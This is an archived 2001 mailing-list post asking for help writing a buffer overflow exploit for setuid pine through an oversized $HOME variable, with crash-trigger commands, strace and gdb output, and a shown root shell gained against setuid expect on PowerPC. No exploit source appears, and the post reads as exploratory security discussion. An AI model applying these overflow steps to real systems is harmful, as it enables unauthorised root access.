Hi all, Has anyone ever coded a pine exploit. I know it's vulnerable to a $HOME strcpy() problem. And I have seen it suid this or that on several ISPs even though it shouldn't be ever! What are the implications of this with pine itself can you simply run a command from within it. I don't think pine was designed to be run as a suid and I'm not sure why anyone would give it such permissions. [-(root@devastator:~/bleedingedge)> export HOME=`perl -e 'print "i" x 6969'` [-(:1-07-11-20:20:51)-]<p0> [-(root@devastator:/home/core/bleedingedge)> pine [-(:1-07-11-20:21:10)-]<p0> zsh: segmentation fault pine [-(root@devastator:/home/core/bleedingedge)> strace pine [-(:1-07-11-20:21:12)-]<p0> execve("/usr/bin/pine", ["pine"], [/* 20 vars */]) = 0 mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40007000 mprotect(0x40000000, 20353, PROT_READ|PROT_WRITE|PROT_EXEC) = 0 mprotect(0x8048000, 1352085, PROT_READ|PROT_WRITE|PROT_EXEC) = 0 stat("/etc/ld.so.cache", {st_mode=S_IFREG|0644, st_size=8183, ...}) = 0 open("/etc/ld.so.cache", O_RDONLY) = 3 mmap(0, 8183, PROT_READ, MAP_SHARED, 3, 0) = 0x40008000 close(3) = 0 stat("/etc/ld.so.preload", 0xbfffe180) = -1 ENOENT (No such file or directory) open("/lib/libtermcap.so.2", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096 mmap(0, 12288, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000a000 mmap(0x4000a000, 7276, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x4000a000 mmap(0x4000c000, 3496, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x1000) = 0x4000c000 close(3) = 0 mprotect(0x4000a000, 7276, PROT_READ|PROT_WRITE|PROT_EXEC) = 0 open("/lib/libc.so.5", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096 mmap(0, 831488, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000d000 mmap(0x4000d000, 599154, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x4000d000 mmap(0x400a0000, 22664, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x92000) = 0x400a0000 mmap(0x400a6000, 200812, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x400a6000 close(3) = 0 mprotect(0x4000d000, 599154, PROT_READ|PROT_WRITE|PROT_EXEC) = 0 munmap(0x40008000, 8183) = 0 mprotect(0x8048000, 1352085, PROT_READ|PROT_EXEC) = 0 mprotect(0x4000a000, 7276, PROT_READ|PROT_EXEC) = 0 mprotect(0x4000d000, 599154, PROT_READ|PROT_EXEC) = 0 mprotect(0x40000000, 20353, PROT_READ|PROT_EXEC) = 0 personality(PER_LINUX) = 0 geteuid() = 0 getuid() = 0 getgid() = 0 getegid() = 11 brk(0x81abb88) = 0x81abb88 brk(0x81ac000) = 0x81ac000 getpid() = 21010 time(NULL) = 994904475 getuid() = 0 open("/etc/nsswitch.conf", O_RDONLY) = 3 brk(0x81af000) = 0x81af000 fstat(3, {st_mode=S_IFREG|0644, st_size=1215, ...}) = 0 mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40008000 read(3, "#\n# /etc/nsswitch.conf\n#\n# An"..., 4096) = 1215 read(3, "", 4096) = 0 close(3) = 0 munmap(0x40008000, 4096) = 0 open("/etc/passwd", O_RDONLY) = 3 fstat(3, {st_mode=S_IFREG|0644, st_size=28709, ...}) = 0 mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40008000 read(3, "root:x:0:0::/root:/bin/sh\ndaemo"..., 4096) = 4096 lseek(3, -4070, SEEK_CUR) = 26 close(3) = 0 munmap(0x40008000, 4096) = 0 brk(0x81b1000) = 0x81b1000 ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 --- SIGSEGV (Segmentation fault) --- +++ killed by SIGSEGV +++ [-(root@devastator:~/bleedingedge/test)> ./exploit4 [-(:1-07-11-20:34:22)-]<p0> Using address: 0xbffffcc4 [root@devastator ~/bleedingedge/test]# export HOME=$EGG [root@devastator /home/core/bleedingedge/test]# gdb pine GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation, Inc... (gdb) r Starting program: /usr/bin/pine zsh: path too long: .zshenv Program received signal SIGSEGV, Segmentation fault. 0x4007a43f in strcpy () (gdb) bt #0 0x4007a43f in strcpy () #1 0x804a590 in _start () #2 0x90909090 in ?? () Cannot access memory at address 0x90909090. (gdb) frame 0 #0 0x4007a43f in strcpy () (gdb) list pine.c:252: No such file or directory. Also I'm not quite understanding coding overflows on x86. I cant seem to overwrite the eip and my attempts on expect and pine both segfault. Can someone tell me what I'm missing. It's harder but easier on ppc arch. :) I mean it works so well on my iBook! [ Buffer size: 512 Egg size: 2048 Aligment: 0] [ Address: 0x100111f8 Offset: 0 ] sh-2.05$ export HOME=$EGG sh-2.05$ expect sh-2.05# id uid=0(root) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio),30(dip) sh-2.05# I don't feel like building pine for ppc but I'm sure it's just as simple. Thanks in advance for any x86 help. Best Regards, Charles Stevenson
This archive was generated by hypermail 2b30 : Thu Jul 12 2001 - 21:46:06 PDT